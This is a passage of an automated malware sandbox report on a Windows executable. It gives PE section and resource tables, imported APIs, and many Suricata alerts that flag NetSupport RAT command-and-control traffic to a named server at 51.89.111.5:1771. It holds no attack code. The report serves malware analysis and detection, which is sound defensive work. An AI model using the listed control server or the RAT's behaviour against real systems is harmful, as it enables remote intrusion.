IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x24bf6	0x24c00	58a9ca04e8d7d72d8ea956d0c04d893b	False	0.603601987670068	data	6.720138769636979	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x26000	0x4f23	0x5000	15b53b2dcd83528cc2fede537a04fb5d	False	0.3095703125	data	4.132820400989866	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x2b000	0x215c0	0x1400	54bc68aae6ec67a573882466cd7280a5	False	0.230859375	data	2.527027818522875	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.text	0x4d000	0xaeecc	0xaf000	c799c842463ecbbbf8c4896d99525a04	False	0.6811481584821428	DOS executable (COM)	7.220223726792702	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0xfc000	0x70a8	0x7200	46bcdabb618400fc0e5b034f3e3da773	False	0.34536047149122806	data	5.143900541561644	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x104000	0x250f4	0x25200	0d6d1943689963594581792bcb4f2c93	False	0.3296112163299663	data	4.577964992516896	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_BITMAP	0x1045dc	0xbb6	Device independent bitmap graphic, 93 x 302 x 4, 2 compression, image size 2894, resolution 2835 x 2835 px/m	English	United States	0.2581721147431621
RT_ICON	0x105194	0x4503	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced			0.9958680024905191
RT_ICON	0x109698	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 9600			0.16733704010410505
RT_ICON	0x119ec0	0x5488	Device independent bitmap graphic, 72 x 144 x 32, image size 9600			0.26899260628465804
RT_ICON	0x11f348	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 9600			0.2946976854038734
RT_ICON	0x123570	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600			0.37894190871369293
RT_ICON	0x125b18	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 9600			0.5023452157598499
RT_ICON	0x126bc0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 9600			0.7171985815602837
RT_DIALOG	0x127028	0x286	data	English	United States	0.5030959752321982
RT_DIALOG	0x1272b0	0x13a	data	English	United States	0.6050955414012739
RT_DIALOG	0x1273ec	0xec	data	English	United States	0.6991525423728814
RT_DIALOG	0x1274d8	0x12e	data	English	United States	0.5860927152317881
RT_DIALOG	0x127608	0x338	data	English	United States	0.44538834951456313
RT_DIALOG	0x127940	0x252	data	English	United States	0.5757575757575758
RT_STRING	0x127b94	0x1e2	data	English	United States	0.3900414937759336
RT_STRING	0x127d78	0x1cc	data	English	United States	0.4282608695652174
RT_STRING	0x127f44	0x218	data	English	United States	0.46828358208955223
RT_STRING	0x12815c	0x146	data	English	United States	0.5153374233128835
RT_STRING	0x1282a4	0x446	data	English	United States	0.340036563071298
RT_STRING	0x1286ec	0x166	data	English	United States	0.49162011173184356
RT_STRING	0x128854	0x120	data	English	United States	0.5451388888888888
RT_STRING	0x128974	0xba	data	English	United States	0.4946236559139785
RT_STRING	0x128a30	0xa2	data	English	United States	0.6049382716049383
RT_GROUP_ICON	0x128ad4	0x68	data			0.7596153846153846
RT_MANIFEST	0x128b3c	0x5b8	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.4385245901639344

Imports

DLL	Import
OLEAUT32.dll	VariantInit
ole32.dll	CreateStreamOnHGlobal
SHELL32.dll	SHFileOperationW
ADVAPI32.dll	AdjustTokenPrivileges
COMDLG32.dll	GetOpenFileNameW
GDI32.dll	DeleteObject
USER32.dll	LoadBitmapW
KERNEL32.dll	RtlUnwind
SHLWAPI.dll	SHAutoComplete
COMCTL32.dll	InitCommonControlsEx

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-01T18:10:56.289168+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49977	51.89.111.5	1771	TCP
2024-11-01T18:10:56.289168+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49977	51.89.111.5	1771	TCP
2024-11-01T18:10:56.289168+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49977	51.89.111.5	1771	TCP
2024-11-01T18:10:56.289168+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49977	51.89.111.5	1771	TCP
2024-11-01T18:10:56.289168+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49977	51.89.111.5	1771	TCP
2024-11-01T18:10:56.289168+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49977	51.89.111.5	1771	TCP
2024-11-01T18:11:10.929682+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49700	51.89.111.5	1771	TCP
2024-11-01T18:11:14.216055+0100	2035894	ET MALWARE NetSupport RAT with System Information	1	192.168.2.7	49700	51.89.111.5	1771	TCP
2024-11-01T18:11:14.216055+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49700	51.89.111.5	1771	TCP
2024-11-01T18:11:20.661224+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	52.149.20.212	443	192.168.2.7	49728	TCP
2024-11-01T18:11:58.977593+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	52.149.20.212	443	192.168.2.7	49939	TCP
2024-11-01T18:12:07.062631+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49965	51.89.111.5	1771	TCP
2024-11-01T18:12:07.565835+0100	2035894	ET MALWARE NetSupport RAT with System Information	1	192.168.2.7	49965	51.89.111.5	1771	TCP
2024-11-01T18:12:07.565835+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49965	51.89.111.5	1771	TCP
2024-11-01T18:12:07.767876+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49965	51.89.111.5	1771	TCP
2024-11-01T18:12:07.767876+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49965	51.89.111.5	1771	TCP
2024-11-01T18:12:07.867640+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49965	51.89.111.5	1771	TCP
2024-11-01T18:12:07.968070+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49965	51.89.111.5	1771	TCP
2024-11-01T18:12:08.068759+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49965	51.89.111.5	1771	TCP
2024-11-01T18:12:08.169633+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49965	51.89.111.5	1771	TCP
2024-11-01T18:12:08.270929+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49965	51.89.111.5	1771	TCP
2024-11-01T18:12:08.370931+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49965	51.89.111.5	1771	TCP
2024-11-01T18:12:08.471610+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49965	51.89.111.5	1771	TCP
2024-11-01T18:12:08.572648+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49965	51.89.111.5	1771	TCP
2024-11-01T18:12:08.673635+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49965	51.89.111.5	1771	TCP
2024-11-01T18:12:08.774613+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49965	51.89.111.5	1771	TCP
2024-11-01T18:12:08.874878+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49965	51.89.111.5	1771	TCP
2024-11-01T18:12:08.974635+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49965	51.89.111.5	1771	TCP
2024-11-01T18:12:09.075635+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49965	51.89.111.5	1771	TCP
2024-11-01T18:12:09.176647+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49965	51.89.111.5	1771	TCP
2024-11-01T18:12:09.281072+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49965	51.89.111.5	1771	TCP
2024-11-01T18:12:09.381700+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49965	51.89.111.5	1771	TCP
2024-11-01T18:12:09.482636+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49965	51.89.111.5	1771	TCP
2024-11-01T18:12:09.583617+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49965	51.89.111.5	1771	TCP
2024-11-01T18:12:09.684640+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49965	51.89.111.5	1771	TCP
2024-11-01T18:12:09.884648+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49965	51.89.111.5	1771	TCP
2024-11-01T18:12:09.884648+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49965	51.89.111.5	1771	TCP
2024-11-01T18:12:09.984805+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49965	51.89.111.5	1771	TCP
2024-11-01T18:12:10.085640+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49965	51.89.111.5	1771	TCP
2024-11-01T18:12:10.185730+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49965	51.89.111.5	1771	TCP
2024-11-01T18:12:10.286663+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49965	51.89.111.5	1771	TCP
2024-11-01T18:12:10.387662+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49965	51.89.111.5	1771	TCP
2024-11-01T18:12:10.488637+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49965	51.89.111.5	1771	TCP
2024-11-01T18:12:10.503174+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49965	51.89.111.5	1771	TCP
2024-11-01T18:12:46.884070+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49974	51.89.111.5	1771	TCP
2024-11-01T18:12:46.984057+0100	2035894	ET MALWARE NetSupport RAT with System Information	1	192.168.2.7	49974	51.89.111.5	1771	TCP
2024-11-01T18:12:46.984057+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49974	51.89.111.5	1771	TCP
2024-11-01T18:12:47.084059+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49974	51.89.111.5	1771	TCP
2024-11-01T18:12:47.181870+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49974	51.89.111.5	1771	TCP
2024-11-01T18:12:47.284069+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49974	51.89.111.5	1771	TCP
2024-11-01T18:12:47.382839+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49974	51.89.111.5	1771	TCP
2024-11-01T18:12:47.484065+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49974	51.89.111.5	1771	TCP
2024-11-01T18:12:47.583844+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49974	51.89.111.5	1771	TCP
2024-11-01T18:12:47.683820+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49974	51.89.111.5	1771	TCP
2024-11-01T18:12:47.784828+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49974	51.89.111.5	1771	TCP
2024-11-01T18:12:47.884865+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49974	51.89.111.5	1771	TCP
2024-11-01T18:12:47.986231+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49974	51.89.111.5	1771	TCP
2024-11-01T18:12:48.086827+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49974	51.89.111.5	1771	TCP
2024-11-01T18:12:48.186857+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49974	51.89.111.5	1771	TCP
2024-11-01T18:12:48.287546+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49974	51.89.111.5	1771	TCP
2024-11-01T18:12:48.438872+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49974	51.89.111.5	1771	TCP
2024-11-01T18:12:48.644080+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49974	51.89.111.5	1771	TCP
2024-11-01T18:12:48.748062+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49974	51.89.111.5	1771	TCP
2024-11-01T18:12:48.848055+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49974	51.89.111.5	1771	TCP
2024-11-01T18:12:48.946839+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49974	51.89.111.5	1771	TCP
2024-11-01T18:12:49.048062+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49974	51.89.111.5	1771	TCP
2024-11-01T18:12:49.147854+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49974	51.89.111.5	1771	TCP
2024-11-01T18:12:49.247879+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49974	51.89.111.5	1771	TCP
2024-11-01T18:12:49.348827+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49974	51.89.111.5	1771	TCP
2024-11-01T18:12:49.452077+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49974	51.89.111.5	1771	TCP
2024-11-01T18:12:49.552058+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49974	51.89.111.5	1771	TCP
2024-11-01T18:12:49.649971+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49974	51.89.111.5	1771	TCP
2024-11-01T18:12:49.750839+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49974	51.89.111.5	1771	TCP
2024-11-01T18:12:49.850879+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49974	51.89.111.5	1771	TCP
2024-11-01T18:12:49.950876+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49974	51.89.111.5	1771	TCP
2024-11-01T18:12:50.051860+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49974	51.89.111.5	1771	TCP
2024-11-01T18:12:50.152877+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49974	51.89.111.5	1771	TCP
2024-11-01T18:12:50.252845+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49974	51.89.111.5	1771	TCP
2024-11-01T18:12:50.312288+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49974	51.89.111.5	1771	TCP
2024-11-01T18:13:26.220183+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49975	51.89.111.5	1771	TCP
2024-11-01T18:13:26.320009+0100	2035894	ET MALWARE NetSupport RAT with System Information	1	192.168.2.7	49975	51.89.111.5	1771	TCP
2024-11-01T18:13:26.320009+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49975	51.89.111.5	1771	TCP
2024-11-01T18:13:26.420967+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49975	51.89.111.5	1771	TCP
2024-11-01T18:13:26.722291+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49975	51.89.111.5	1771	TCP
2024-11-01T18:13:26.722291+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49975	51.89.111.5	1771	TCP
2024-11-01T18:13:26.722291+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49975	51.89.111.5	1771	TCP
2024-11-01T18:13:26.822995+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49975	51.89.111.5	1771	TCP
2024-11-01T18:13:26.923019+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49975	51.89.111.5	1771	TCP
2024-11-01T18:13:27.026395+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49975	51.89.111.5	1771	TCP
2024-11-01T18:13:27.126444+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49975	51.89.111.5	1771	TCP
2024-11-01T18:13:27.228177+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49975	51.89.111.5	1771	TCP
2024-11-01T18:13:27.325031+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49975	51.89.111.5	1771	TCP
2024-11-01T18:13:27.427469+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49975	51.89.111.5	1771	TCP
2024-11-01T18:13:27.526014+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49975	51.89.111.5	1771	TCP
2024-11-01T18:13:27.627710+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49975	51.89.111.5	1771	TCP
2024-11-01T18:13:27.727121+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49975	51.89.111.5	1771	TCP
2024-11-01T18:13:27.827020+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49975	51.89.111.5	1771	TCP
2024-11-01T18:13:27.928113+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49975	51.89.111.5	1771	TCP
2024-11-01T18:13:28.028118+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49975	51.89.111.5	1771	TCP
2024-11-01T18:13:28.128063+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49975	51.89.111.5	1771	TCP
2024-11-01T18:13:28.229211+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49975	51.89.111.5	1771	TCP
2024-11-01T18:13:28.329231+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49975	51.89.111.5	1771	TCP
2024-11-01T18:13:28.430009+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49975	51.89.111.5	1771	TCP
2024-11-01T18:13:28.531013+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49975	51.89.111.5	1771	TCP
2024-11-01T18:13:28.631998+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49975	51.89.111.5	1771	TCP
2024-11-01T18:13:28.936158+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49975	51.89.111.5	1771	TCP
2024-11-01T18:13:28.936158+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49975	51.89.111.5	1771	TCP
2024-11-01T18:13:28.936158+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49975	51.89.111.5	1771	TCP
2024-11-01T18:13:29.033039+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49975	51.89.111.5	1771	TCP
2024-11-01T18:13:29.136151+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49975	51.89.111.5	1771	TCP
2024-11-01T18:13:29.235748+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49975	51.89.111.5	1771	TCP
2024-11-01T18:13:29.336150+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49975	51.89.111.5	1771	TCP
2024-11-01T18:13:29.436163+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49975	51.89.111.5	1771	TCP
2024-11-01T18:13:29.537658+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49975	51.89.111.5	1771	TCP
2024-11-01T18:13:29.637008+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49975	51.89.111.5	1771	TCP
2024-11-01T18:13:29.652239+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49975	51.89.111.5	1771	TCP
2024-11-01T18:14:05.454813+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49976	51.89.111.5	1771	TCP
2024-11-01T18:14:05.559579+0100	2035894	ET MALWARE NetSupport RAT with System Information	1	192.168.2.7	49976	51.89.111.5	1771	TCP
2024-11-01T18:14:05.559579+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49976	51.89.111.5	1771	TCP
2024-11-01T18:14:05.660267+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49976	51.89.111.5	1771	TCP
2024-11-01T18:14:05.764251+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49976	51.89.111.5	1771	TCP
2024-11-01T18:14:05.861252+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49976	51.89.111.5	1771	TCP
2024-11-01T18:14:05.961321+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49976	51.89.111.5	1771	TCP
2024-11-01T18:14:06.062231+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49976	51.89.111.5	1771	TCP
2024-11-01T18:14:06.163278+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49976	51.89.111.5	1771	TCP
2024-11-01T18:14:06.264304+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49976	51.89.111.5	1771	TCP
2024-11-01T18:14:06.364287+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49976	51.89.111.5	1771	TCP
2024-11-01T18:14:06.465251+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49976	51.89.111.5	1771	TCP
2024-11-01T18:14:06.566242+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49976	51.89.111.5	1771	TCP
2024-11-01T18:14:06.667351+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49976	51.89.111.5	1771	TCP
2024-11-01T18:14:06.767239+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49976	51.89.111.5	1771	TCP
2024-11-01T18:14:06.868263+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49976	51.89.111.5	1771	TCP
2024-11-01T18:14:06.968458+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49976	51.89.111.5	1771	TCP
2024-11-01T18:14:07.068252+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49976	51.89.111.5	1771	TCP
2024-11-01T18:14:07.169225+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49976	51.89.111.5	1771	TCP
2024-11-01T18:14:07.270236+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49976	51.89.111.5	1771	TCP
2024-11-01T18:14:07.370240+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49976	51.89.111.5	1771	TCP
2024-11-01T18:14:07.470239+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49976	51.89.111.5	1771	TCP
2024-11-01T18:14:07.570283+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49976	51.89.111.5	1771	TCP
2024-11-01T18:14:07.674268+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49976	51.89.111.5	1771	TCP
2024-11-01T18:14:07.771244+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49976	51.89.111.5	1771	TCP
2024-11-01T18:14:07.871288+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49976	51.89.111.5	1771	TCP
2024-11-01T18:14:07.971332+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49976	51.89.111.5	1771	TCP
2024-11-01T18:14:08.071359+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49976	51.89.111.5	1771	TCP
2024-11-01T18:14:08.172242+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49976	51.89.111.5	1771	TCP
2024-11-01T18:14:08.272273+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49976	51.89.111.5	1771	TCP
2024-11-01T18:14:08.373272+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49976	51.89.111.5	1771	TCP
2024-11-01T18:14:08.473338+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49976	51.89.111.5	1771	TCP
2024-11-01T18:14:08.574238+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49976	51.89.111.5	1771	TCP
2024-11-01T18:14:08.674247+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49976	51.89.111.5	1771	TCP
2024-11-01T18:14:08.774347+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49976	51.89.111.5	1771	TCP
2024-11-01T18:14:08.850668+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49976	51.89.111.5	1771	TCP
2024-11-01T18:14:44.417389+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49977	51.89.111.5	1771	TCP
2024-11-01T18:14:44.518406+0100	2035894	ET MALWARE NetSupport RAT with System Information	1	192.168.2.7	49977	51.89.111.5	1771	TCP
2024-11-01T18:14:44.518406+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49977	51.89.111.5	1771	TCP
2024-11-01T18:14:44.618662+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49977	51.89.111.5	1771	TCP
2024-11-01T18:14:44.719432+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49977	51.89.111.5	1771	TCP
2024-11-01T18:14:44.820115+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49977	51.89.111.5	1771	TCP
2024-11-01T18:14:44.920350+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49977	51.89.111.5	1771	TCP
2024-11-01T18:14:45.022902+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49977	51.89.111.5	1771	TCP
2024-11-01T18:14:45.121438+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49977	51.89.111.5	1771	TCP
2024-11-01T18:14:45.222671+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49977	51.89.111.5	1771	TCP
2024-11-01T18:14:45.322478+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49977	51.89.111.5	1771	TCP
2024-11-01T18:14:45.422523+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49977	51.89.111.5	1771	TCP
2024-11-01T18:14:45.526509+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49977	51.89.111.5	1771	TCP
2024-11-01T18:14:45.624412+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49977	51.89.111.5	1771	TCP
2024-11-01T18:14:45.728344+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49977	51.89.111.5	1771	TCP
2024-11-01T18:14:45.824935+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.7	49977	51.89.111.5	1771	TCP
